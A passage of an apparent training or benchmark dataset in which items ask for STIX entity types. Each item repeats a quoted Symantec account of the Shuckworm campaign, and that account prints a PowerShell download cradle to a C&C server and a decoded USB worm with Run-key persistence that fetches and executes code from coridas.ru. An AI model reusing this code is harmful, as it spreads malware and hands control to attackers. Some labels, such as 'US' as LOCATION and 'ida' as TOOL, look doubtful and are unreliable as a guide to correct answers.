$env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPowerShell\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSHELL32.DLL\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUS\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nida\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
